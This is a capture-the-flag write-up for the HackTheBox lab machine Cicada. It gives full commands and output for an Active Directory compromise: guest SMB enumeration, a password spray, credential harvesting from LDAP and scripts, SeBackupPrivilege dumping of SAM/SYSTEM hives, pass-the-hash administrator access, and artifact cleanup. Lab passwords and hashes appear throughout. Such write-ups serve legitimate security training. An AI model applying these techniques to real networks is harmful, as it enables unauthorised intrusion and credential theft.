HackTheBox Cicada
Writeup for HackTheBox Cicada
Machine Synopsis
Cicada is an easy-difficult Windows machine that focuses on beginner Active Directory enumeration and exploitation. In this machine, players will enumerate the domain, identify users, navigate shares, uncover plaintext passwords stored in files, execute a password spray, and use the SeBackupPrivilege to achieve full system compromise. (Source)
Key exploitation techniques:
- Active Directory enumeration via
nmapandsmbclient - Sensitive file extraction from open SMB shares
- Password spraying with collected credentials
- LDAP enumeration for additional user information
SeBackupPrivilegeabuse for registry hive backup- Offline SAM/SYSTEM hive cracking for NTLM hashes
Enumeration
An nmap scan identified standard Active Directory services (DNS, Kerberos, LDAP, SMB, WSMAN) and confirmed the domain cicada.htb.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ nmap -p- --min-rate 10000 10.10.11.35
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
54375/tcp open unknown
❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,54375 -sC -sV 10.10.11.35
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
...
445/tcp open microsoft-ds?
...
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
The domain cicada.htb was added to /etc/hosts for proper hostname resolution.
1
❯ echo -e '10.10.11.35\tcicada.htb' | sudo tee -a /etc/hosts
SMB Share Enumeration & Credential Leak
Anonymous (guest) access to SMB shares was attempted. The HR share was found to be accessible.
1
2
3
4
5
6
7
8
9
10
11
❯ smbclient -L //cicada.htb -N # -N for null/guest session
Sharename Type Comment
--------- ---- -------
HR Disk
# ... (truncated)
❯ smbclient -N //cicada.htb/HR
smb: \> ls
Notice from HR.txt
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt ...
The file Notice from HR.txt was downloaded. Its content contained a leaked default password: Cicada$M6Corpb*@Lp#nZp!8.
1
2
3
❯ cat Notice\ from\ HR.txt
# Excerpt from Notice from HR.txt
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Exploitation
Domain User Enumeration & Password Spray
Domain users were enumerated using nxc smb with rid-brute as guest.
1
❯ nxc smb cicada.htb -u "guest" -p '' --rid-brute | grep SidTypeUser | awk '{print $6}' | cut -d '\' -f 2 > users.txt
This extracted a list of usernames to users.txt: Administrator, Guest, krbtgt, john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars.
A password spray attack was performed using nxc smb with the collected usernames and the leaked password Cicada$M6Corpb*@Lp#nZp!8.
1
2
❯ nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
The password spray was successful for michael.wrightson.
LDAP Enumeration & Further Credential Discovery
nxc ldap was used with michael.wrightson’s credentials to perform detailed LDAP enumeration.
1
2
3
4
❯ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
LDAP 10.10.11.35 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.10.11.35 389 CICADA-DC -Username- -Description-
LDAP 10.10.11.35 389 CICADA-DC david.orelious Just in case I forget my password is aRt$Lp#7t*VQ!3
The description for david.orelious contained a plaintext password: aRt$Lp#7t*VQ!3.
Lateral Movement: DEV Share & emily.oscars Credentials
The credentials for david.orelious were used to access the DEV SMB share.
1
2
3
4
5
❯ smbclient //cicada.htb/DEV -U 'david.orelious'
smb: \> ls
Backup_script.ps1
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 ...
The Backup_script.ps1 file was downloaded.
1
2
3
4
5
❯ cat Backup_script.ps1
# Excerpt from Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
The script contained a hardcoded password Q!3@Lp#M6b*7t*Vt for user emily.oscars.
The credentials for emily.oscars were used to establish a WinRM session.
1
2
3
4
❯ evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
e35ed9c05bc36ad168eedb0c9c424cf2
The user.txt flag was retrieved.
Privilege Escalation: SeBackupPrivilege Abuse
From emily.oscars’s session, whoami /all was executed to enumerate user privileges.
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
# ... (truncated)
emily.oscars had SeBackupPrivilege and SeRestorePrivilege enabled. This is a common privilege for backup operators and can be abused to read sensitive system files, including the Security Account Manager (SAM) and SYSTEM registry hives, which contain local user hashes.
Dumping SAM & SYSTEM Hives
The reg save command, leveraging SeBackupPrivilege, was used to save copies of the SAM and SYSTEM registry hives to a writable directory (C:\Temp).
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> mkdir C:\Temp
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> reg save hklm\sam C:\Temp\SAM
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> reg save hklm\system C:\Temp\System
The operation completed successfully.
The saved SAM and SYSTEM files were then downloaded to the attacker machine using evil-winrm’s download command.
1
2
3
4
5
6
*Evil-WinRM* PS C:\Temp> download SAM
Info: Downloading C:\Temp\SAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download SYSTEM
Info: Downloading C:\Temp\SYSTEM to SYSTEM
Info: Download successful!
Offline Hash Extraction
pypykatz was used on the attacker machine to extract NTLM hashes from the downloaded SAM and SYSTEM hives.
1
2
3
4
5
6
7
8
9
❯ /usr/bin/pypykatz registry --sam SAM SYSTEM
============== SYSTEM hive secrets ==============
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
The NTLM hash for the Administrator account was extracted: 2b87e7c93a3e8a0ea4a581937016f341.
Alternative Hash Extraction:
impacket-secretsdumpcan also be used to extract hashes from offline SAM/SYSTEM hives.
Administrator Access
The Administrator’s NTLM hash was used to establish a WinRM session.
1
2
3
4
❯ evil-winrm -i cicada.htb -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
9974b4993142309c73bbcb08044b4154
Cleanup
To maintain operational security, any artifacts left on the target system should be removed.
1
2
3
# On target machine as Administrator
*Evil-WinRM* PS C:\> rm C:\Temp\SAM, C:\Temp\System # Remove the saved hive files
*Evil-WinRM* PS C:\> rmdir C:\Temp # Remove the temporary directory